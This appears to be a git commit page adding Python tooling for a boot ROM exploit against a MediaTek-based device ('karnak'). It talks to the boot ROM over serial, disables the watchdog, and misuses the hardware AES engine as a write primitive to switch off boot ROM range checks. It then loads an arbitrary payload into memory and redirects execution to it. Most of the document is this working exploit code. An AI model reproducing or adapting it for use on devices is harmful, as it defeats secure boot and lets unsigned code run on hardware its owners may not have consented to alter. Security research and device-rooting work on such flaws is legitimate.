Commit 45c54ebc authored by Ilya Zhuravlev's avatar Ilya Zhuravlev
Browse files

Initial

parents
Loading
Loading
Loading
Loading

.gitignore

0 → 100644
+4 −0
Original line number Diff line number Diff line
__pycache__
*.pyc
build
*.log

modules/common.py

0 → 100644
+159 −0
Original line number Diff line number Diff line
import struct
import sys
import glob
import time

import serial

from logger import log

BAUD = 115200
TIMEOUT = 0.5


CRYPTO_BASE = 0x10210000 # for karnak


def serial_ports ():
    """ Lists available serial ports

        :raises EnvironmentError:
            On unsupported or unknown platforms
        :returns:
            A set containing the serial ports available on the system
    """

    if sys.platform.startswith("win"):
        ports = [ "COM{0:d}".format(i + 1) for i in range(256) ]
    elif sys.platform.startswith("linux"):
        ports = glob.glob("/dev/ttyACM*")
    elif sys.platform.startswith("darwin"):
        ports = glob.glob("/dev/cu.usbmodem*")
    else:
        raise EnvironmentError("Unsupported platform")

    result = set()
    for port in ports:
        try:
            s = serial.Serial(port, timeout=TIMEOUT)
            s.close()
            result.add(port)
        except (OSError, serial.SerialException):
            pass

    return result


class Device:

    def __init__(self, port=None):
        self.dev = None
        if port:
            self.dev = serial.Serial(port, BAUD, timeout=TIMEOUT)

    def find_device(self):
        if self.dev:
            raise RuntimeError("Device already found")

        log("Waiting for bootrom")

        old = serial_ports()
        while True:
            new = serial_ports()

            # port added
            if new > old:
                port = (new - old).pop()
                break
            # port removed
            elif old > new:
                old = new

            time.sleep(0.25)

        log("Found port = {}".format(port))

        self.dev = serial.Serial(port, BAUD, timeout=TIMEOUT)

    def check(self, test, gold):
        if test != gold:
            raise RuntimeError("ERROR: Serial protocol mismatch")

    def check_int(self, test, gold):
        test = struct.unpack('>I', test)[0]
        self.check(test, gold)

    def _writeb(self, out_str):
        self.dev.write(out_str)
        return self.dev.read()

    def handshake(self):
        # look for start byte
        while True:
            c = self._writeb(b'\xa0')
            if c == b'\x5f':
                break
            self.dev.flushInput()

        # complete sequence
        self.check(self._writeb(b'\x0a'), b'\xf5')
        self.check(self._writeb(b'\x50'), b'\xaf')
        self.check(self._writeb(b'\x05'), b'\xfa')

    def read32(self, addr, size=1):
        result = []

        self.dev.write(b'\xd1')
        self.check(self.dev.read(1), b'\xd1') # echo cmd

        self.dev.write(struct.pack('>I', addr))
        self.check_int(self.dev.read(4), addr) # echo addr

        self.dev.write(struct.pack('>I', size))
        self.check_int(self.dev.read(4), size) # echo size

        self.check(self.dev.read(2), b'\x00\x00') # arg check

        for _ in range(size):
            data = struct.unpack('>I', self.dev.read(4))[0]
            result.append(data)

        self.check(self.dev.read(2), b'\x00\x00') # status

        # support scalar
        if len(result) == 1:
            return result[0]
        else:
            return result

    def write32(self, addr, words, status_check=True):
        # support scalar
        if not isinstance(words, list):
            words = [ words ]

        self.dev.write(b'\xd4')
        self.check(self.dev.read(1), b'\xd4') # echo cmd

        self.dev.write(struct.pack('>I', addr))
        self.check_int(self.dev.read(4), addr) # echo addr

        self.dev.write(struct.pack('>I', len(words)))
        self.check_int(self.dev.read(4), len(words)) # echo size

        self.check(self.dev.read(2), b'\x00\x01') # arg check

        for word in words:
            self.dev.write(struct.pack('>I', word))
            self.check_int(self.dev.read(4), word) # echo word

        if status_check:
            self.check(self.dev.read(2), b'\x00\x01') # status

    def run_ext_cmd(self, cmd):
        self.dev.write(b'\xC8')
        self.check(self.dev.read(1), b'\xC8') # echo cmd
        cmd = bytes([cmd])
        self.dev.write(cmd)
        self.check(self.dev.read(1), cmd)
        self.dev.read(1)
        self.dev.read(2)

modules/handshake.py

0 → 100644
+20 −0
Original line number Diff line number Diff line
import sys

from common import Device
from logger import log


def handshake(dev):
    log("Handshake")
    dev.handshake()
    log("Disable watchdog")
    dev.write32(0x10007000, 0x22000000)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        dev = Device(sys.argv[1])
    else:
        dev = Device()
        dev.find_device()
    handshake(dev)
+117 −0
Original line number Diff line number Diff line
import struct

from common import CRYPTO_BASE

from logger import log


def init(dev):
    dev.write32(CRYPTO_BASE + 0x0C0C, 0)
    dev.write32(CRYPTO_BASE + 0x0C10, 0)
    dev.write32(CRYPTO_BASE + 0x0C14, 0)
    dev.write32(CRYPTO_BASE + 0x0C18, 0)
    dev.write32(CRYPTO_BASE + 0x0C1C, 0)
    dev.write32(CRYPTO_BASE + 0x0C20, 0)
    dev.write32(CRYPTO_BASE + 0x0C24, 0)
    dev.write32(CRYPTO_BASE + 0x0C28, 0)
    dev.write32(CRYPTO_BASE + 0x0C2C, 0)
    dev.write32(CRYPTO_BASE + 0x0C00 + 18 * 4, [0] * 4)
    dev.write32(CRYPTO_BASE + 0x0C00 + 22 * 4, [0] * 4)
    dev.write32(CRYPTO_BASE + 0x0C00 + 26 * 4, [0] * 8)


def hw_acquire(dev):
    dev.write32(CRYPTO_BASE, [0x1F, 0x12000])


def call_func(dev, func):
    dev.write32(CRYPTO_BASE + 0x0804, 3)
    dev.write32(CRYPTO_BASE + 0x0808, 3)
    dev.write32(CRYPTO_BASE + 0x0C00, func)
    dev.write32(CRYPTO_BASE + 0x0400, 0)
    while (not dev.read32(CRYPTO_BASE + 0x0800)):
        pass
    if (dev.read32(CRYPTO_BASE + 0x0800) & 2):
        if ( not (dev.read32(CRYPTO_BASE + 0x0800) & 1) ):
          while ( not dev.read32(CRYPTO_BASE + 0x0800) ):
            pass
        result = -1;
        dev.write32(CRYPTO_BASE + 0x0804, 3)
    else:
        while ( not (dev.read32(CRYPTO_BASE + 0x0418) & 1) ):
            pass
        result = 0;
        dev.write32(CRYPTO_BASE + 0x0804, 3)
    return result


def aes_write16(dev, addr, data):
    if len(data) != 16:
        raise RuntimeError("data must be 16 bytes")

    pattern = bytes.fromhex("4dd12bdf0ec7d26c482490b3482a1b1f")

    # iv-xor
    words = []
    for x in range(4):
        word = data[x*4:(x+1)*4]
        word = struct.unpack("<I", word)[0]
        pat = struct.unpack("<I", pattern[x*4:(x+1)*4])[0]
        words.append(word ^ pat)

    dev.write32(CRYPTO_BASE + 0xC00 + 18 * 4, [0] * 4)
    dev.write32(CRYPTO_BASE + 0xC00 + 22 * 4, [0] * 4)
    dev.write32(CRYPTO_BASE + 0xC00 + 26 * 4, [0] * 8)

    dev.write32(CRYPTO_BASE + 0xC00 + 26 * 4, words)

    dev.write32(CRYPTO_BASE + 0xC04, 0) # src to VALID address which has all zeroes (otherwise, update pattern)
    dev.write32(CRYPTO_BASE + 0xC08, addr) # dst to our destination
    dev.write32(CRYPTO_BASE + 0xC0C, 1)
    dev.write32(CRYPTO_BASE + 0xC14, 18)
    dev.write32(CRYPTO_BASE + 0xC18, 26)
    dev.write32(CRYPTO_BASE + 0xC1C, 26)
    if call_func(dev, 126) != 0: # aes decrypt
        raise RuntimeError("failed to call the function!")


def load_payload(dev, path):
    log("Init crypto engine")
    init(dev)
    hw_acquire(dev)
    init(dev)
    hw_acquire(dev)

    log("Disable caches")
    dev.run_ext_cmd(0xB1)

    log("Disable bootrom range checks")
    aes_write16(dev, 0x102868, bytes.fromhex("00000000000000000000000080000000"))

    with open(path, "rb") as fin:
        payload = fin.read()
    log("Load payload from {} = 0x{:X} bytes".format(path, len(payload)))
    while len(payload) % 4 != 0:
        payload += b"\x00"

    words = []
    for x in range(len(payload) // 4):
        word = payload[x*4:(x+1)*4]
        word = struct.unpack("<I", word)[0]
        words.append(word)

    print("")
    print(" * * * Remove the short and press Enter * * * ")
    print("")
    input()

    log("Send payload")
    dev.write32(0x201000, words)

    log("Let's rock")
    dev.write32(0x1028A8, 0x201000, status_check=False)


if __name__ == "__main__":
    dev = Device(sys.argv[1])
    load_payload(dev, sys.argv[2])

modules/logger.py

0 → 100644
+8 −0
Original line number Diff line number Diff line
import datetime

def log(s):
    line = "[{}] {}".format(datetime.datetime.now(), s)
    print(line)

    with open("amonet.log", "a") as fout:
        fout.write(line + "\n")